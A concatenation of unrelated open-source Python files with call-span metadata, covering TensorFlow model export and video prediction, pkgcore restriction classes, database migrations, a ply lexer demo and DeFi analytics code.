"""Get the best eval result from event files. Args: event_files: Absolute pattern of event files. Returns: The best eval result. """ if not event_files: return None event_count = 0 best_eval_result = None for event_file in gfile.Glob(os.path.join(event_files)): for event in summary_iterator.summary_iterator(event_file): if event.HasField('summary'): event_eval_result = {} for value in event.summary.value: if value.HasField('simple_value'): event_eval_result[value.tag] = value.simple_value if event_eval_result: if best_eval_result is None or self._compare_fn( best_eval_result, event_eval_result): event_count += 1 best_eval_result = event_eval_result if event_count < 2: return None return best_eval_result
[((627, 651), 'tensorflow.python.estimator.util.fn_args', 'util.fn_args', (['compare_fn'], {}), '(compare_fn)\n', (639, 651), False, 'from tensorflow.python.estimator import util\n'), ((6454, 6529), 'tensorflow.python.estimator.exporter._SavedModelExporter', '_SavedModelExporter', (['name', 'serving_input_receiver_fn', 'assets_extra', 'as_text'], {}), '(name, serving_input_receiver_fn, assets_extra, as_text)\n', (6473, 6529), False, 'from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter\n'), ((8977, 9012), 'glob.glob', 'glob.glob', (["(checkpoint_pattern + '*')"], {}), "(checkpoint_pattern + '*')\n", (8986, 9012), False, 'import glob\n'), ((10180, 10230), 'tensorflow.python.estimator.gc._largest_export_versions', 'gc._largest_export_versions', (['self._exports_to_keep'], {}), '(self._exports_to_keep)\n', (10207, 10230), False, 'from tensorflow.python.estimator import gc\n'), ((10255, 10280), 'tensorflow.python.estimator.gc._negation', 'gc._negation', (['keep_filter'], {}), '(keep_filter)\n', (10267, 10280), False, 'from tensorflow.python.estimator import gc\n'), ((7276, 7332), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Loading best metric from event files."""'], {}), "('Loading best metric from event files.')\n", (7291, 7332), False, 'from tensorflow.python.platform import tf_logging\n'), ((7422, 7477), 'os.path.join', 'os.path.join', (['self._model_dir', 'self._event_file_pattern'], {}), '(self._model_dir, self._event_file_pattern)\n', (7434, 7477), False, 'import os\n'), ((7661, 7700), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7673, 7700), False, 'import os\n'), ((8164, 8212), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Performing best model export."""'], {}), "('Performing best model export.')\n", (8179, 8212), False, 'from tensorflow.python.platform import tf_logging\n'), ((9026, 9054), 'shutil.copy', 'shutil.copy', (['file', 'dest_path'], {}), '(file, dest_path)\n', (9037, 9054), False, 'import shutil\n'), ((9930, 9957), 'os.path.basename', 'os.path.basename', (['path.path'], {}), '(path.path)\n', (9946, 9957), False, 'import os\n'), ((10330, 10391), 'tensorflow.python.estimator.gc._get_paths', 'gc._get_paths', (['export_dir_base'], {'parser': '_export_version_parser'}), '(export_dir_base, parser=_export_version_parser)\n', (10343, 10391), False, 'from tensorflow.python.estimator import gc\n'), ((11051, 11076), 'os.path.join', 'os.path.join', (['event_files'], {}), '(event_files)\n', (11063, 11076), False, 'import os\n'), ((11104, 11149), 'tensorflow.python.summary.summary_iterator.summary_iterator', 'summary_iterator.summary_iterator', (['event_file'], {}), '(event_file)\n', (11137, 11149), False, 'from tensorflow.python.summary import summary_iterator\n'), ((8832, 8856), 'json.dump', 'json.dump', (['self._log', 'fp'], {}), '(self._log, fp)\n', (8841, 8856), False, 'import json\n'), ((9073, 9110), 'os.path.join', 'os.path.join', (['dest_path', '"""checkpoint"""'], {}), "(dest_path, 'checkpoint')\n", (9085, 9110), False, 'import os\n'), ((10465, 10496), 'tensorflow.python.platform.gfile.DeleteRecursively', 'gfile.DeleteRecursively', (['p.path'], {}), '(p.path)\n', (10488, 10496), False, 'from tensorflow.python.platform import gfile\n'), ((8763, 8802), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (8775, 8802), False, 'import os\n'), ((10564, 10627), 'tensorflow.python.platform.tf_logging.warn', 'tf_logging.warn', (['"""Can not delete %s recursively: %s"""', 'p.path', 'e'], {}), "('Can not delete %s recursively: %s', p.path, e)\n", (10579, 10627), False, 'from tensorflow.python.platform import tf_logging\n'), ((7790, 7829), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7802, 7829), False, 'import os\n')]
mgorny/pkgcore
src/pkgcore/restrictions/restriction.py
ab4a718aa1626f4edeb385383f5595a1e262b0dc
# Copyright: 2005-2012 Brian Harring <[email protected] # Copyright: 2006 Marien Zwart <[email protected]> # License: BSD/GPL2 """ base restriction class """ from functools import partial from snakeoil import caching, klass from snakeoil.currying import pretty_docs class base(object, metaclass=caching.WeakInstMeta): """base restriction matching object. all derivatives *should* be __slot__ based (lot of instances may wind up in memory). """ __inst_caching__ = True # __weakref__ here is implicit via the metaclass __slots__ = () package_matching = False klass.inject_immutable_instance(locals()) def match(self, *arg, **kwargs): raise NotImplementedError def force_False(self, *arg, **kwargs): return not self.match(*arg, **kwargs) def force_True(self, *arg, **kwargs): return self.match(*arg, **kwargs) def __len__(self): return 1 class AlwaysBool(base): """restriction that always yields a specific boolean""" __slots__ = ("type", "negate") __inst_caching__ = True def __init__(self, node_type=None, negate=False): """ :param node_type: the restriction type the instance should be, typically :obj:`pkgcore.restrictions.packages.package_type` or :obj:`pkgcore.restrictions.values.value_type` :param negate: boolean to return for the match """ object.__setattr__(self, "negate", negate) object.__setattr__(self, "type", node_type) def match(self, *a, **kw): return self.negate def force_True(self, *a, **kw): return self.negate def force_False(self, *a, **kw): return not self.negate def __iter__(self): return iter(()) def __str__(self): return f"always '{self.negate}'" def __repr__(self): return '<%s always %r @%#8x>' % ( self.__class__.__name__, self.negate, id(self)) def __getstate__(self): return self.negate, self.type def __setstate__(self, state): negate, node_type = state object.__setattr__(self, "negate", negate) object.__setattr__(self, "type", node_type) class Negate(base): """wrap and negate a restriction instance""" __slots__ = ("type", "_restrict") __inst_caching__ = False def __init__(self, restrict): """ :param restrict: :obj:`pkgcore.restrictions.restriction.base` instance to negate """ sf = object.__setattr__ sf(self, "type", restrict.type) sf(self, "_restrict", restrict) def match(self, *a, **kw): return not self._restrict.match(*a, **kw) def __str__(self): return "not (%s)" % self._restrict class FakeType(base): """wrapper to wrap and fake a node_type""" __slots__ = ("type", "_restrict") __inst_caching__ = False def __init__(self, restrict, new_type): """ :param restrict: :obj:`pkgcore.restrictions.restriction.base` instance to wrap :param new_type: new node_type """ sf = object.__setattr__ sf(self, "type", new_type) sf(self, "_restrict", restrict) def match(self, *a, **kw): return self._restrict.match(*a, **kw) def __str__(self): return "Faked type(%s): %s" % (self.type, self._restrict) class AnyMatch(base): """Apply a nested restriction to every item in a sequence.""" __slots__ = ('restriction', 'type', 'negate') def __init__(self, childrestriction, node_type, negate=False): """Initialize. :type childrestriction: restriction :param childrestriction: child restriction applied to every value. :type node_type: string :param node_type: type of this restriction. """ sf = object.__setattr__ sf(self, "negate", negate) sf(self, "restriction", childrestriction) sf(self, "type", node_type) def match(self, val): for x in val: if self.restriction.match(x): return not self.negate return self.negate def __str__(self): return "any: %s match" % (self.restriction,) def __repr__(self): return '<%s restriction=%r @%#8x>' % ( self.__class__.__name__, self.restriction, id(self)) def curry_node_type(cls, node_type, extradoc=None): """Helper function for creating restrictions of a certain type. This uses :obj:`partial` to pass a node_type to the wrapped class, and extends the docstring. :param cls: callable (usually a class) that is wrapped. :param node_type: value passed as node_type. :param extradoc: addition to the docstring. Defaults to "Automatically set to %s type." % node_type :return: a wrapped callable. """ if extradoc is None: extradoc = "Automatically set to %s type." % (node_type,) doc = cls.__doc__ result = partial(cls, node_type=node_type) if doc is None: doc = '' else: # do this so indentation on pydoc __doc__ is sane doc = "\n".join(line.lstrip() for line in doc.split("\n")) + "\n" doc += extradoc return pretty_docs(result, doc) value_type = "values" package_type = "package" valid_types = (value_type, package_type)
[((4966, 4999), 'functools.partial', 'partial', (['cls'], {'node_type': 'node_type'}), '(cls, node_type=node_type)\n', (4973, 4999), False, 'from functools import partial\n'), ((5214, 5238), 'snakeoil.currying.pretty_docs', 'pretty_docs', (['result', 'doc'], {}), '(result, doc)\n', (5225, 5238), False, 'from snakeoil.currying import pretty_docs\n')]
kkaarreell/keylime
keylime/migrations/versions/8da20383f6e1_extend_ip_field.py
e12658bb6dc945b694e298b8ac337a204ab86ed2
"""extend_ip_field Revision ID: 8da20383f6e1 Revises: eeb702f77d7d Create Date: 2021-01-14 10:50:56.275257 """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = "8da20383f6e1" down_revision = "eeb702f77d7d" branch_labels = None depends_on = None def upgrade(engine_name): globals()[f"upgrade_{engine_name}"]() def downgrade(engine_name): globals()[f"downgrade_{engine_name}"]() def upgrade_registrar(): pass def downgrade_registrar(): pass def upgrade_cloud_verifier(): with op.batch_alter_table("verifiermain") as batch_op: batch_op.alter_column( "ip", existing_type=sa.String(length=15), type_=sa.String(length=255), existing_nullable=True ) def downgrade_cloud_verifier(): pass
[((557, 593), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""verifiermain"""'], {}), "('verifiermain')\n", (577, 593), False, 'from alembic import op\n'), ((670, 690), 'sqlalchemy.String', 'sa.String', ([], {'length': '(15)'}), '(length=15)\n', (679, 690), True, 'import sqlalchemy as sa\n'), ((698, 719), 'sqlalchemy.String', 'sa.String', ([], {'length': '(255)'}), '(length=255)\n', (707, 719), True, 'import sqlalchemy as sa\n')]
Tatsuya26/processamento_de_linguagens
token_train/quickdemo(1)(1).py
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
import ply.lex as lex tokens =["NUM","OPERADORES"] t_NUM = '\d+' t_OPERADORES = '[+|*|-]' t_ignore='\n\t ' def t_error(t): print("Erro") print(t) lexer = lex.lex() # 1+2 1-2 1*2 # ola mundo import sys for line in sys.stdin: lexer.input(line) for tok in lexer: print(tok)
[((167, 176), 'ply.lex.lex', 'lex.lex', ([], {}), '()\n', (174, 176), True, 'import ply.lex as lex\n')]
Ecotrust/ucsrb
ucsrb/migrations/0013_auto_20180710_2040.py
29d97cf1f21537aaf24f38e7dedc7c8cfccf1f12
# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-07-10 20:40 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('ucsrb', '0012_auto_20180710_1249'), ] operations = [ migrations.AddField( model_name='treatmentscenario', name='landform_type', field=models.BooleanField(default=False), ), migrations.AddField( model_name='treatmentscenario', name='landform_type_checkboxes', field=models.TextField(blank=True, default=None, null=True), ), migrations.AddField( model_name='treatmentscenario', name='landform_type_checkboxes_include_east_west', field=models.BooleanField(default=True), ), migrations.AddField( model_name='treatmentscenario', name='landform_type_checkboxes_include_floor', field=models.BooleanField(default=True), ), migrations.AddField( model_name='treatmentscenario', name='landform_type_checkboxes_include_north', field=models.BooleanField(default=True), ), migrations.AddField( model_name='treatmentscenario', name='landform_type_checkboxes_include_ridgetop', field=models.BooleanField(default=True), ), migrations.AddField( model_name='treatmentscenario', name='landform_type_checkboxes_include_south', field=models.BooleanField(default=True), ), ]
[((415, 449), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (434, 449), False, 'from django.db import migrations, models\n'), ((598, 651), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (614, 651), False, 'from django.db import migrations, models\n'), ((818, 851), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (837, 851), False, 'from django.db import migrations, models\n'), ((1014, 1047), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1033, 1047), False, 'from django.db import migrations, models\n'), ((1210, 1243), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1229, 1243), False, 'from django.db import migrations, models\n'), ((1409, 1442), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1428, 1442), False, 'from django.db import migrations, models\n'), ((1605, 1638), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1624, 1638), False, 'from django.db import migrations, models\n')]
fei-protocol/checkthechain
src/ctc/protocols/fei_utils/analytics/payload_crud.py
ec838f3d0d44af228f45394d9ba8d8eb7f677520
from __future__ import annotations import typing from ctc import spec from . import timestamp_crud from . import metric_crud from . import analytics_spec async def async_create_payload( *, blocks: typing.Sequence[spec.BlockNumberReference] | None = None, timestamps: typing.Sequence[int] | None = None, timescale: analytics_spec.TimescaleSpec | None = None, end_time: analytics_spec.Timestamp | None = None, window_size: str | None = None, interval_size: str | None = None, provider: spec.ProviderSpec = None, ) -> analytics_spec.AnalyticsPayload: """create data payload from scratch""" time_data = await timestamp_crud.async_get_time_data( blocks=blocks, timestamps=timestamps, timescale=timescale, end_time=end_time, window_size=window_size, interval_size=interval_size, provider=provider, ) # get data data = await metric_crud.async_get_metrics( blocks=time_data['block_numbers'] ) return { 'version': '0.1.0', # # time data 'n_samples': time_data['n_samples'], 'window_size': time_data['window_size'], 'interval_size': time_data['interval_size'], 'timestamps': time_data['timestamps'], 'block_numbers': time_data['block_numbers'], 'created_at_timestamp': time_data['created_at_timestamp'], # # metric data 'data': data, } # def update_payload( # timescale: analytics_spec.Timescale, # old_payload: analytics_spec.AnalyticsPayload, # ) -> analytics_spec.AnalyticsPayload: # new_timestamps = get_new_timestamps( # timescale=timescale, # old_payload=old_payload, # ) # new_blocks = get_new_blocks( # new_timestamps=new_timestamps, # old_payload=old_payload, # ) # new_metrics = get_metrics(blocks=new_blocks) # return combine_new_data( # old_payload=old_payload, # new_metrics=new_metrics, # )
[]
mbz/models
research/video_prediction/prediction_model.py
98dcd8dbcb1027e4b22f79113018df30da4b8590
# Copyright 2016 The TensorFlow Authors All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Model architecture for predictive model, including CDNA, DNA, and STP.""" import numpy as np import tensorflow as tf import tensorflow.contrib.slim as slim from tensorflow.python.platform import flags from tensorflow.contrib.layers.python import layers as tf_layers from lstm_ops import basic_conv_lstm_cell FLAGS = flags.FLAGS # Amount to use when lower bounding tensors RELU_SHIFT = 1e-12 # kernel size for DNA and CDNA. DNA_KERN_SIZE = 5 def kl_divergence(mu, log_sigma): """KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1). Args: mu: mu parameter of the distribution. log_sigma: log(sigma) parameter of the distribution. Returns: the KL loss. """ return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma), axis=1) def construct_latent_tower(images): """Builds convolutional latent tower for stochastic model. At training time this tower generates a latent distribution (mean and std) conditioned on the entire video. This latent variable will be fed to the main tower as an extra variable to be used for future frames prediction. At inference time, the tower is disabled and only returns latents sampled from N(0,1). If the multi_latent flag is on, a different latent for every timestep would be generated. Args: images: tensor of ground truth image sequences Returns: latent_mean: predicted latent mean latent_std: predicted latent standard deviation latent_loss: loss of the latent twoer samples: random samples sampled from standard guassian """ with slim.arg_scope([slim.conv2d], reuse=False): stacked_images = tf.concat(images, 3) latent_enc1 = slim.conv2d( stacked_images, 32, [3, 3], stride=2, scope='latent_conv1', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm1'}) latent_enc2 = slim.conv2d( latent_enc1, 64, [3, 3], stride=2, scope='latent_conv2', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm2'}) latent_enc3 = slim.conv2d( latent_enc2, 64, [3, 3], stride=1, scope='latent_conv3', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm3'}) latent_mean = slim.conv2d( latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, activation_fn=None, scope='latent_mean', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm_mean'}) latent_std = slim.conv2d( latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, scope='latent_std', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_std_norm'}) latent_std += FLAGS.latent_std_min divergence = kl_divergence(latent_mean, latent_std) latent_loss = tf.reduce_mean(divergence) if FLAGS.multi_latent: # timestep x batch_size x latent_size samples = tf.random_normal( [FLAGS.sequence_length-1] + latent_mean.shape, 0, 1, dtype=tf.float32) else: # batch_size x latent_size samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32) if FLAGS.inference_time: # No latent tower at inference time, just standard gaussian. return None, None, None, samples else: return latent_mean, latent_std, latent_loss, samples def construct_model(images, actions=None, states=None, iter_num=-1.0, k=-1, use_state=True, num_masks=10, stp=False, cdna=True, dna=False, context_frames=2): """Build convolutional lstm video predictor using STP, CDNA, or DNA. Args: images: tensor of ground truth image sequences actions: tensor of action sequences states: tensor of ground truth state sequences iter_num: tensor of the current training iteration (for sched. sampling) k: constant used for scheduled sampling. -1 to feed in own prediction. use_state: True to include state and action in prediction num_masks: the number of different pixel motion predictions (and the number of masks for each of those predictions) stp: True to use Spatial Transformer Predictor (STP) cdna: True to use Convoluational Dynamic Neural Advection (CDNA) dna: True to use Dynamic Neural Advection (DNA) context_frames: number of ground truth frames to pass in before feeding in own predictions Returns: gen_images: predicted future image frames gen_states: predicted future states Raises: ValueError: if more than one network option specified or more than 1 mask specified for DNA model. """ # Each image is being used twice, in latent tower and main tower. # This is to make sure we are using the *same* image for both, ... # ... given how TF queues work. images = [tf.identity(image) for image in images] if stp + cdna + dna != 1: raise ValueError('More than one, or no network option specified.') batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4] lstm_func = basic_conv_lstm_cell # Generated robot states and images. gen_states, gen_images = [], [] current_state = states[0] if k == -1: feedself = True else: # Scheduled sampling: # Calculate number of ground-truth frames to pass in. num_ground_truth = tf.to_int32( tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k))))) feedself = False # LSTM state sizes and states. lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32])) lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None lstm_state5, lstm_state6, lstm_state7 = None, None, None # Latent tower latent_loss = 0.0 if FLAGS.stochastic_model: latent_tower_outputs = construct_latent_tower(images) latent_mean, latent_std, latent_loss, samples = latent_tower_outputs # Main tower for image, action in zip(images[:-1], actions[:-1]): # Reuse variables after the first timestep. reuse = bool(gen_images) done_warm_start = len(gen_images) > context_frames - 1 with slim.arg_scope( [lstm_func, slim.layers.conv2d, slim.layers.fully_connected, tf_layers.layer_norm, slim.layers.conv2d_transpose], reuse=reuse): if feedself and done_warm_start: # Feed in generated image. prev_image = gen_images[-1] elif done_warm_start: # Scheduled sampling prev_image = scheduled_sample(image, gen_images[-1], batch_size, num_ground_truth) else: # Always feed in ground_truth prev_image = image # Predicted state is always fed back in state_action = tf.concat(axis=1, values=[action, current_state]) enc0 = slim.layers.conv2d( prev_image, 32, [5, 5], stride=2, scope='scale1_conv1', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'layer_norm1'}) hidden1, lstm_state1 = lstm_func( enc0, lstm_state1, lstm_size[0], scope='state1') hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2') hidden2, lstm_state2 = lstm_func( hidden1, lstm_state2, lstm_size[1], scope='state2') hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3') enc1 = slim.layers.conv2d( hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2') hidden3, lstm_state3 = lstm_func( enc1, lstm_state3, lstm_size[2], scope='state3') hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4') hidden4, lstm_state4 = lstm_func( hidden3, lstm_state4, lstm_size[3], scope='state4') hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5') enc2 = slim.layers.conv2d( hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3') # Pass in state and action. smear = tf.reshape( state_action, [int(batch_size), 1, 1, int(state_action.get_shape()[1])]) smear = tf.tile( smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1]) if use_state: enc2 = tf.concat(axis=3, values=[enc2, smear]) # Setup latent if FLAGS.stochastic_model: latent = samples if FLAGS.multi_latent: latent = samples[timestep] if not FLAGS.inference_time: latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage, lambda: tf.identity(latent), lambda: latent_mean + tf.exp(latent_std / 2.0) * latent) with tf.control_dependencies([latent]): enc2 = tf.concat([enc2, latent], 3) enc3 = slim.layers.conv2d( enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4') hidden5, lstm_state5 = lstm_func( enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8 hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6') enc4 = slim.layers.conv2d_transpose( hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1') hidden6, lstm_state6 = lstm_func( enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16 hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7') # Skip connection. hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16 enc5 = slim.layers.conv2d_transpose( hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2') hidden7, lstm_state7 = lstm_func( enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32 hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8') # Skip connection. hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32 enc6 = slim.layers.conv2d_transpose( hidden7, hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None, normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'layer_norm9'}) if dna: # Using largest hidden state for predicting untied conv kernels. enc7 = slim.layers.conv2d_transpose( enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None) else: # Using largest hidden state for predicting a new image layer. enc7 = slim.layers.conv2d_transpose( enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None) # This allows the network to also generate one image from scratch, # which is useful when regions of the image become unoccluded. transformed = [tf.nn.sigmoid(enc7)] if stp: stp_input0 = tf.reshape(hidden5, [int(batch_size), -1]) stp_input1 = slim.layers.fully_connected( stp_input0, 100, scope='fc_stp') transformed += stp_transformation(prev_image, stp_input1, num_masks) elif cdna: cdna_input = tf.reshape(hidden5, [int(batch_size), -1]) transformed += cdna_transformation(prev_image, cdna_input, num_masks, int(color_channels)) elif dna: # Only one mask is supported (more should be unnecessary). if num_masks != 1: raise ValueError('Only one mask is supported for DNA model.') transformed = [dna_transformation(prev_image, enc7)] masks = slim.layers.conv2d_transpose( enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None) masks = tf.reshape( tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])), [int(batch_size), int(img_height), int(img_width), num_masks + 1]) mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks) output = mask_list[0] * prev_image for layer, mask in zip(transformed, mask_list[1:]): output += layer * mask gen_images.append(output) current_state = slim.layers.fully_connected( state_action, int(current_state.get_shape()[1]), scope='state_pred', activation_fn=None) gen_states.append(current_state) return gen_images, gen_states, latent_loss ## Utility functions def stp_transformation(prev_image, stp_input, num_masks): """Apply spatial transformer predictor (STP) to previous image. Args: prev_image: previous image to be transformed. stp_input: hidden layer to be used for computing STN parameters. num_masks: number of masks and hence the number of STP transformations. Returns: List of images transformed by the predicted STP parameters. """ # Only import spatial transformer if needed. from spatial_transformer import transformer identity_params = tf.convert_to_tensor( np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32)) transformed = [] for i in range(num_masks - 1): params = slim.layers.fully_connected( stp_input, 6, scope='stp_params' + str(i), activation_fn=None) + identity_params transformed.append(transformer(prev_image, params)) return transformed def cdna_transformation(prev_image, cdna_input, num_masks, color_channels): """Apply convolutional dynamic neural advection to previous image. Args: prev_image: previous image to be transformed. cdna_input: hidden lyaer to be used for computing CDNA kernels. num_masks: the number of masks and hence the number of CDNA transformations. color_channels: the number of color channels in the images. Returns: List of images transformed by the predicted CDNA kernels. """ batch_size = int(cdna_input.get_shape()[0]) height = int(prev_image.get_shape()[1]) width = int(prev_image.get_shape()[2]) # Predict kernels using linear function of last hidden layer. cdna_kerns = slim.layers.fully_connected( cdna_input, DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks, scope='cdna_params', activation_fn=None) # Reshape and normalize. cdna_kerns = tf.reshape( cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]) cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True) cdna_kerns /= norm_factor # Treat the color channel dimension as the batch dimension since the same # transformation is applied to each color channel. # Treat the batch dimension as the channel dimension so that # depthwise_conv2d can apply a different transformation to each sample. cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3]) cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks]) # Swap the batch and channel dimensions. prev_image = tf.transpose(prev_image, [3, 1, 2, 0]) # Transform image. transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME') # Transpose the dimensions to where they belong. transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks]) transformed = tf.transpose(transformed, [3, 1, 2, 0, 4]) transformed = tf.unstack(transformed, axis=-1) return transformed def dna_transformation(prev_image, dna_input): """Apply dynamic neural advection to previous image. Args: prev_image: previous image to be transformed. dna_input: hidden lyaer to be used for computing DNA transformation. Returns: List of images transformed by the predicted CDNA kernels. """ # Construct translated images. prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]]) image_height = int(prev_image.get_shape()[1]) image_width = int(prev_image.get_shape()[2]) inputs = [] for xkern in range(DNA_KERN_SIZE): for ykern in range(DNA_KERN_SIZE): inputs.append( tf.expand_dims( tf.slice(prev_image_pad, [0, xkern, ykern, 0], [-1, image_height, image_width, -1]), [3])) inputs = tf.concat(axis=3, values=inputs) # Normalize channels to 1. kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT kernel = tf.expand_dims( kernel / tf.reduce_sum( kernel, [3], keep_dims=True), [4]) return tf.reduce_sum(kernel * inputs, [3], keep_dims=False) def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth): """Sample batch with specified mix of ground truth and generated data points. Args: ground_truth_x: tensor of ground-truth data points. generated_x: tensor of generated data points. batch_size: batch size num_ground_truth: number of ground-truth examples to include in batch. Returns: New batch with num_ground_truth sampled from ground_truth_x and the rest from generated_x. """ idx = tf.random_shuffle(tf.range(int(batch_size))) ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth)) generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size))) ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx) generated_examps = tf.gather(generated_x, generated_idx) return tf.dynamic_stitch([ground_truth_idx, generated_idx], [ground_truth_examps, generated_examps])
[((14752, 14879), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['cdna_input', '(DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks)'], {'scope': '"""cdna_params"""', 'activation_fn': 'None'}), "(cdna_input, DNA_KERN_SIZE * DNA_KERN_SIZE *\n num_masks, scope='cdna_params', activation_fn=None)\n", (14779, 14879), True, 'import tensorflow.contrib.slim as slim\n'), ((14944, 15029), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]'], {}), '(cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]\n )\n', (14954, 15029), True, 'import tensorflow as tf\n'), ((15112, 15164), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['cdna_kerns', '[1, 2, 3]'], {'keep_dims': '(True)'}), '(cdna_kerns, [1, 2, 3], keep_dims=True)\n', (15125, 15164), True, 'import tensorflow as tf\n'), ((15475, 15516), 'tensorflow.transpose', 'tf.transpose', (['cdna_kerns', '[1, 2, 0, 4, 3]'], {}), '(cdna_kerns, [1, 2, 0, 4, 3])\n', (15487, 15516), True, 'import tensorflow as tf\n'), ((15532, 15609), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks]'], {}), '(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])\n', (15542, 15609), True, 'import tensorflow as tf\n'), ((15668, 15706), 'tensorflow.transpose', 'tf.transpose', (['prev_image', '[3, 1, 2, 0]'], {}), '(prev_image, [3, 1, 2, 0])\n', (15680, 15706), True, 'import tensorflow as tf\n'), ((15745, 15813), 'tensorflow.nn.depthwise_conv2d', 'tf.nn.depthwise_conv2d', (['prev_image', 'cdna_kerns', '[1, 1, 1, 1]', '"""SAME"""'], {}), "(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')\n", (15767, 15813), True, 'import tensorflow as tf\n'), ((15882, 15961), 'tensorflow.reshape', 'tf.reshape', (['transformed', '[color_channels, height, width, batch_size, num_masks]'], {}), '(transformed, [color_channels, height, width, batch_size, num_masks])\n', (15892, 15961), True, 'import tensorflow as tf\n'), ((15978, 16020), 'tensorflow.transpose', 'tf.transpose', (['transformed', 